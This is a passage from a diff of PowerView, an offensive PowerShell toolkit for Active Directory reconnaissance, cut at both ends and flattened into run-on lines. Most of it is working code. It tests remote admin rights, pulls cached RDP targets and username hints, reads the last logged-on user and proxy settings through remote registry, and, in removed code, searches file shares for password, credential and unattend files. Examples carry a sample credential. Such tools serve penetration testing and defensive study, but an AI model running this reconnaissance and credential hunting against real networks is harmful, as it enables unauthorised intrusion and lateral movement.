'TargetServer' $Server - $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint - $FoundConnection + else { + Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } - + # close off the service handle + $Null = $Wtsapi32::WTSCloseServer($Handle) } - catch { - Write-Verbose "Error: $_" + else { + Write-Verbose "[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName" } } - } - catch { - Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -filter Get-RegistryMountedDrive { +function Test-AdminAccess { <# - .SYNOPSIS +.SYNOPSIS + +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" ' + 'Thomas McCarthy "smilingraccoon" ' + 'Royce Davis "r3dy" ' - Uses remote registry functionality to query all entries for the - the saved network mounted drive on a machine, separated by - user and target server. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf - Note: This function requires administrative rights on the - machine you're enumerating. +.DESCRIPTION - .PARAMETER ComputerName +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. If this succeeds, the current user context +has local administrator acess to the target. - The hostname to query for RDP client information. - Defaults to localhost. +.PARAMETER ComputerName - .PARAMETER Credential +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. - A [Management.Automation.PSCredential] object for the remote connection. +.PARAMETER Credential - .EXAMPLE +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. - PS C:\> Get-RegistryMountedDrive +.EXAMPLE - Returns the saved network mounted drives for the local machine. +Test-AdminAccess -ComputerName sqlserver - .EXAMPLE +Returns results indicating whether the current user has admin access to the 'sqlserver' host. - PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local +.EXAMPLE - Returns the saved network mounted drives for the WINDOWS2.testlab.local machine +Get-DomainComputer | Test-AdminAccess - .EXAMPLE +Returns what machines in the domain the current user has access to. - PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local -Credential $Cred +.EXAMPLE - Returns the saved network mounted drives for the WINDOWS2.testlab.local machine using alternate credentials. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred - .EXAMPLE +.OUTPUTS - PS C:\> Get-NetComputer | Get-RegistryMountedDrive +PowerView.AdminAccess - Get the saved network mounted drives for all machines in the domain. +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. + +.LINK + +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> + [OutputType('PowerView.AdminAccess')] [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] [ValidateNotNullOrEmpty()] + [String[]] $ComputerName = 'localhost', [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField - - # HKEY_USERS - $HKU = 2147483651 - - try { - if($Credential) { - $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue - } - else { - $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } + } - # extract out the SIDs of domain users in this hive - $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } - - foreach ($UserSID in $UserSIDs) { - - try { - $UserName = Convert-SidToName $UserSID - - $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames + PROCESS { + ForEach ($Computer in $ComputerName) { + # 0xF003F - SC_MANAGER_ALL_ACCESS + # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx + $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() - ForEach($DriveLetter in $DriveLetters) { - $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue - $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue - $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue - if(-not $UserName) { $UserName = '' } + $IsAdmin = New-Object PSObject + $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer - if($RemotePath -and ($RemotePath -ne '')) { - $MountedDrive = New-Object PSObject - $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer - $MountedDrive | Add-Member Noteproperty 'UserName' $UserName - $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID - $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter - $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName - $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath - $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName - $MountedDrive - } - } + # if we get a non-zero handle back, everything was successful + if ($Handle -ne 0) { + $Null = $Advapi32::CloseServiceHandle($Handle) + $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True } - catch { - Write-Verbose "Error: $_" + else { + Write-Verbose "[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False } + $IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess') + $IsAdmin } } - catch { - Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -filter Get-NetProcess { +function Get-NetComputerSiteName { <# - .SYNOPSIS +.SYNOPSIS - Gets a list of processes/owners on a remote machine. +Returns the AD site where the local (or a remote) machine resides. - .PARAMETER ComputerName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf - The hostname to query processes. Defaults to the local host name. +.DESCRIPTION - .PARAMETER Credential +This function will use the DsGetSiteName Win32API call to look up the +name of the site where a specified computer resides. - A [Management.Automation.PSCredential] object for the remote connection. +.PARAMETER ComputerName - .EXAMPLE +Specifies the hostname to check the site for (also accepts IP addresses). +Defaults to 'localhost'. - PS C:\> Get-NetProcess -ComputerName WINDOWS1 - - Returns the current processes for WINDOWS1 +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local + +Returns the site for WINDOWS1.testlab.local. + +.EXAMPLE + +Get-DomainComputer | Get-NetComputerSiteName + +Returns the sites for every machine in AD. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.ComputerSite + +A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. #> + [OutputType('PowerView.ComputerSite')] [CmdletBinding()] - param( - [Parameter(ValueFromPipeline=$True)] - [Alias('HostName')] - [Object[]] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] [ValidateNotNullOrEmpty()] - $ComputerName = [System.Net.Dns]::GetHostName(), + [String[]] + $ComputerName = 'localhost', [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - # extract the computer name from whatever object was passed on the pipeline - $Computer = $ComputerName | Get-NameField - - try { - if($Credential) { - $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName -Credential $Credential - } - else { - $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # if we get an IP address, try to resolve the IP to a hostname + if ($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') { + $IPAddress = $Computer + $Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName + } + else { + $IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress + } + + $PtrInfo = [IntPtr]::Zero + + $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo) + + $ComputerSite = New-Object PSObject + $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer + $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress + + if ($Result -eq 0) { + $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo) + $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename + } + else { + Write-Verbose "[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + $ComputerSite | Add-Member Noteproperty 'SiteName' '' + } + $ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite') + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) - $Processes | ForEach-Object { - $Owner = $_.getowner(); - $Process = New-Object PSObject - $Process | Add-Member Noteproperty 'ComputerName' $Computer - $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName - $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID - $Process | Add-Member Noteproperty 'Domain' $Owner.Domain - $Process | Add-Member Noteproperty 'User' $Owner.User - $Process + $ComputerSite } } - catch { - Write-Verbose "[!] Error enumerating remote processes on $Computer, access likely denied: $_" + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } } } -function Find-InterestingFile { +function Get-WMIRegProxy { <# - .SYNOPSIS +.SYNOPSIS - This function recursively searches a given UNC path for files with - specific keywords in the name (default of pass, sensitive, secret, admin, - login and unattend*.xml). The output can be piped out to a csv with the - -OutFile flag. By default, hidden files/folders are included in search results. +Enumerates the proxy server and WPAD conents for the current user. - .PARAMETER Path +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - UNC/local path to recursively search. +.DESCRIPTION - .PARAMETER Terms +Enumerates the proxy server and WPAD specification for the current user +on the local machine (default), or a machine specified with -ComputerName. +It does this by enumerating settings from +HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. - Terms to search for. +.PARAMETER ComputerName - .PARAMETER OfficeDocs +Specifies the system to enumerate proxy settings on. Defaults to the local host. - Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) +.PARAMETER Credential - .PARAMETER FreshEXEs +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. - Switch. Find .EXEs accessed within the last week. +.EXAMPLE - .PARAMETER LastAccessTime +Get-WMIRegProxy - Only return files with a LastAccessTime greater than this date value. +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +WINDOWS1 http://primary.test... - .PARAMETER LastWriteTime +.EXAMPLE - Only return files with a LastWriteTime greater than this date value. +$Cred = Get-Credential "TESTLAB\administrator" +Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local - .PARAMETER CreationTime +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +windows1.testlab.local primary.testlab.local - Only return files with a CreationTime greater than this date value. +.INPUTS - .PARAMETER ExcludeFolders +String - Switch. Exclude folders from the search results. +Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). + +.OUTPUTS + +PowerView.ProxySettings + +Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. +#> - .PARAMETER ExcludeHidden + [OutputType('PowerView.ProxySettings')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, - Switch. Exclude hidden files and folders from the search results. + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - .PARAMETER CheckWriteAccess + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } - Switch. Only returns files the current user has write access to. + $RegProvider = Get-WmiObject @WmiArguments + $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' - .PARAMETER OutFile + # HKEY_CURRENT_USER + $HKCU = 2147483649 + $ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue + $AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue - Output results to a specified csv output file. + $Wpad = '' + if ($AutoConfigURL -and ($AutoConfigURL -ne '')) { + try { + $Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL) + } + catch { + Write-Warning "[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL" + } + } - .PARAMETER UsePSDrive + if ($ProxyServer -or $AutoConfigUrl) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ComputerName' $Computer + $Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer + $Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL + $Out | Add-Member Noteproperty 'Wpad' $Wpad + $Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings') + $Out + } + else { + Write-Warning "[Get-WMIRegProxy] No proxy settings found for $ComputerName" + } + } + catch { + Write-Warning "[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_" + } + } + } +} - Switch. Mount target remote path with temporary PSDrives. - .OUTPUTS +function Get-WMIRegLastLoggedOn { +<# +.SYNOPSIS - The full path, owner, lastaccess time, lastwrite time, and size for each found file. +Returns the last user who logged onto the local (or a remote) machine. - .EXAMPLE +Note: This function requires administrative rights on the machine you're enumerating. - PS C:\> Find-InterestingFile -Path C:\Backup\ - - Returns any files on the local path C:\Backup\ that have the default - search term set in the title. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None - .EXAMPLE +.DESCRIPTION - PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -Terms salaries,email -OutFile out.csv - - Returns any files on the remote path \\WINDOWS7\Users\ that have 'salaries' - or 'email' in the title, and writes the results out to a csv file - named 'out.csv' +This function uses remote registry to enumerate the LastLoggedOnUser registry key +for the local (or remote) machine. - .EXAMPLE +.PARAMETER ComputerName - PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -LastAccessTime (Get-Date).AddDays(-7) +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. - Returns any files on the remote path \\WINDOWS7\Users\ that have the default - search term set in the title and were accessed within the last week. +.PARAMETER Credential - .LINK - - http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/ -#> - - param( - [Parameter(ValueFromPipeline=$True)] - [String] - $Path = '.\', +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. - [Alias('Terms')] - [String[]] - $SearchTerms = @('pass', 'sensitive', 'admin', 'login', 'secret', 'unattend*.xml', '.vmdk', 'creds', 'credential', '.config'), +.EXAMPLE - [Switch] - $OfficeDocs, +Get-WMIRegLastLoggedOn - [Switch] - $FreshEXEs, +Returns the last user logged onto the local machine. - [String] - $LastAccessTime, +.EXAMPLE - [String] - $LastWriteTime, +Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 - [String] - $CreationTime, +Returns the last user logged onto WINDOWS1 - [Switch] - $ExcludeFolders, +.EXAMPLE - [Switch] - $ExcludeHidden, +Get-DomainComputer | Get-WMIRegLastLoggedOn - [Switch] - $CheckWriteAccess, +Returns the last user logged onto all machines in the domain. - [String] - $OutFile, +.EXAMPLE - [Switch] - $UsePSDrive - ) +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred - begin { +.OUTPUTS - $Path += if(!$Path.EndsWith('\')) {"\"} +PowerView.LastLoggedOnUser - if ($Credential) { - $UsePSDrive = $True - } +A PSCustomObject containing the ComputerName and last loggedon user. +#> - # append wildcards to the front and back of all search terms - $SearchTerms = $SearchTerms | ForEach-Object { if($_ -notmatch '^\*.*\*$') {"*$($_)*"} else{$_} } + [OutputType('PowerView.LastLoggedOnUser')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', - # search just for office documents if specified - if ($OfficeDocs) { - $SearchTerms = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx') - } + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) - # find .exe's accessed within the last 7 days - if($FreshEXEs) { - # get an access time limit of 7 days ago - $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy') - $SearchTerms = '*.exe' - } + PROCESS { + ForEach ($Computer in $ComputerName) { + # HKEY_LOCAL_MACHINE + $HKLM = 2147483650 - if($UsePSDrive) { - # if we're PSDrives, create a temporary mount point + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'SilentlyContinue' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } - $Parts = $Path.split('\') - $FolderPath = $Parts[0..($Parts.length-2)] -join '\' - $FilePath = $Parts[-1] + # try to open up the remote registry key to grab the last logged on user + try { + $Reg = Get-WmiObject @WmiArguments - $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join '' - - Write-Verbose "Mounting path '$Path' using a temp PSDrive at $RandDrive" + $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI' + $Value = 'LastLoggedOnUser' + $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue - try { - $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop + $LastLoggedOn = New-Object PSObject + $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer + $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser + $LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser') + $LastLoggedOn } catch { - Write-Verbose "Error mounting path '$Path' : $_" - return $Null + Write-Warning "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled." } - - # so we can cd/dir the new drive - $Path = "${RandDrive}:\${FilePath}" } } +} - process { - Write-Verbose "[*] Search path $Path" +function Get-WMIRegCachedRDPConnection { +<# +.SYNOPSIS - function Invoke-CheckWrite { - # short helper to check is the current user can write to a file - [CmdletBinding()]param([String]$Path) - try { - $Filetest = [IO.FILE]::OpenWrite($Path) - $Filetest.Close() - $True - } - catch { - Write-Verbose -Message $Error[0] - $False - } - } +Returns information about RDP connections outgoing from the local (or remote) machine. - $SearchArgs = @{ - 'Path' = $Path - 'Recurse' = $True - 'Force' = $(-not $ExcludeHidden) - 'Include' = $SearchTerms - 'ErrorAction' = 'SilentlyContinue' - } +Note: This function requires administrative rights on the machine you're enumerating. - Get-ChildItem @SearchArgs | ForEach-Object { - Write-Verbose $_ - # check if we're excluding folders - if(!$ExcludeFolders -or !$_.PSIsContainer) {$_} - } | ForEach-Object { - if($LastAccessTime -or $LastWriteTime -or $CreationTime) { - if($LastAccessTime -and ($_.LastAccessTime -gt $LastAccessTime)) {$_} - elseif($LastWriteTime -and ($_.LastWriteTime -gt $LastWriteTime)) {$_} - elseif($CreationTime -and ($_.CreationTime -gt $CreationTime)) {$_} - } - else {$_} - } | ForEach-Object { - # filter for write access (if applicable) - if((-not $CheckWriteAccess) -or (Invoke-CheckWrite -Path $_.FullName)) {$_} - } | Select-Object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,CreationTime,Length | ForEach-Object { - # check if we're outputting to the pipeline or an output file - if($OutFile) {Export-PowerViewCSV -InputObject $_ -OutFile $OutFile} - else {$_} - } - } +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID - end { - if($UsePSDrive -and $RandDrive) { - Write-Verbose "Removing temp PSDrive $RandDrive" - Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force - } - } -} +.DESCRIPTION +Uses remote registry functionality to query all entries for the +"Windows Remote Desktop Connection Client" on a machine, separated by +user and target server. -######################################################## -# -# 'Meta'-functions start below -# -######################################################## +.PARAMETER ComputerName -function Invoke-ThreadedFunction { - # Helper used by any threaded host enumeration functions - [CmdletBinding()] - param( - [Parameter(Position=0,Mandatory=$True)] - [String[]] - $ComputerName, +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. - [Parameter(Position=1,Mandatory=$True)] - [System.Management.Automation.ScriptBlock] - $ScriptBlock, +.PARAMETER Credential - [Parameter(Position=2)] - [Hashtable] - $ScriptParameters, +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. - [Int] - [ValidateRange(1,100)] - $Threads = 20, +.EXAMPLE - [Switch] - $NoImports - ) +Get-WMIRegCachedRDPConnection - begin { +Returns the RDP connection client information for the local machine. - if ($PSBoundParameters['Debug']) { - $DebugPreference = 'Continue' - } +.EXAMPLE - Write-Verbose "[*] Total number of hosts: $($ComputerName.count)" +Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local - # Adapted from: - # http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/ - $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() - $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState() +Returns the RDP connection client information for the WINDOWS2.testlab.local machine - # import the current session state's variables and functions so the chained PowerView - # functionality can be used by the threaded blocks - if(!$NoImports) { +.EXAMPLE - # grab all the current variables for this runspace - $MyVars = Get-Variable -Scope 2 +Get-DomainComputer | Get-WMIRegCachedRDPConnection - # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice - $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumFunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true") +Returns cached RDP information for all machines in the domain. - # Add Variables from Parent Scope (current runspace) into the InitialSessionState - ForEach($Var in $MyVars) { - if($VorbiddenVars -NotContains $Var.Name) { - $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) - } - } +.EXAMPLE - # Add Functions from current runspace to the InitialSessionState - ForEach($Function in (Get-ChildItem Function:)) { - $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition)) - } - } +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred - # threading adapted from - # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407 - # Thanks Carlos! +.OUTPUTS - # create a pool of maxThread runspaces - $Pool = [runspacefactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host) - $Pool.Open() +PowerView.CachedRDPConnection - $method = $null - ForEach ($m in [PowerShell].GetMethods() | Where-Object { $_.Name -eq "BeginInvoke" }) { - $methodParameters = $m.GetParameters() - if (($methodParameters.Count -eq 2) -and $methodParameters[0].Name -eq "input" -and $methodParameters[1].Name -eq "output") { - $method = $m.MakeGenericMethod([Object], [Object]) - break - } - } +A PSCustomObject containing the ComputerName and cached RDP information. +#> - $Jobs = @() - } + [OutputType('PowerView.CachedRDPConnection')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', - process { + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + PROCESS { ForEach ($Computer in $ComputerName) { + # HKEY_USERS + $HKU = 2147483651 - # make sure we get a server name - if ($Computer -ne '') { - # Write-Verbose "[*] Enumerating server $Computer ($($Counter+1) of $($ComputerName.count))" + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } - While ($($Pool.GetAvailableRunspaces()) -le 0) { - Start-Sleep -MilliSeconds 500 - } + try { + $Reg = Get-WmiObject @WmiArguments - # create a "powershell pipeline runner" - $p = [powershell]::create() + # extract out the SIDs of domain users in this hive + $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } - $p.runspacepool = $Pool + ForEach ($UserSID in $UserSIDs) { + try { + if ($PSBoundParameters['Credential']) { + $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential + } + else { + $UserName = ConvertFrom-SID -ObjectSid $UserSID + } - # add the script block + arguments - $Null = $p.AddScript($ScriptBlock).AddParameter('ComputerName', $Computer) - if($ScriptParameters) { - ForEach ($Param in $ScriptParameters.GetEnumerator()) { - $Null = $p.AddParameter($Param.Name, $Param.Value) - } - } + # pull out all the cached RDP connections + $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames + + ForEach ($Connection in $ConnectionKeys) { + # make sure this key is a cached connection + if ($Connection -match 'MRU.*') { + $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue + + $FoundConnection = New-Object PSObject + $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer + $FoundConnection | Add-Member Noteproperty 'UserName' $UserName + $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID + $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer + $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null + $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection') + $FoundConnection + } + } - $o = New-Object Management.Automation.PSDataCollection[Object] + # pull out all the cached server info with username hints + $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames - $Jobs += @{ - PS = $p - Output = $o - Result = $method.Invoke($p, @($null, [Management.Automation.PSDataCollection[Object]]$o)) - } - } - } - } + ForEach ($Server in $ServerKeys) { - end { - Write-Verbose "Waiting for threads to finish..." + $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue - Do { - ForEach ($Job in $Jobs) { - $Job.Output.ReadAll() + $FoundConnection = New-Object PSObject + $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer + $FoundConnection | Add-Member Noteproperty 'UserName' $UserName + $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID + $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server + $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint + $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection') + $FoundConnection + } + } + catch { + Write-Verbose "[Get-WMIRegCachedRDPConnection] Error: $_" + } + } + } + catch { + Write-Warning "[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" } - } While (($Jobs | Where-Object { ! $_.Result.IsCompleted }).Count -gt 0) - - ForEach ($Job in $Jobs) { - $Job.PS.Dispose() } - - $Pool.Dispose() - Write-Verbose "All threads completed!" } } -function Invoke-UserHunter { +function Get-WMIRegMountedDrive { <# - .SYNOPSIS - - Finds which machines users of a specified 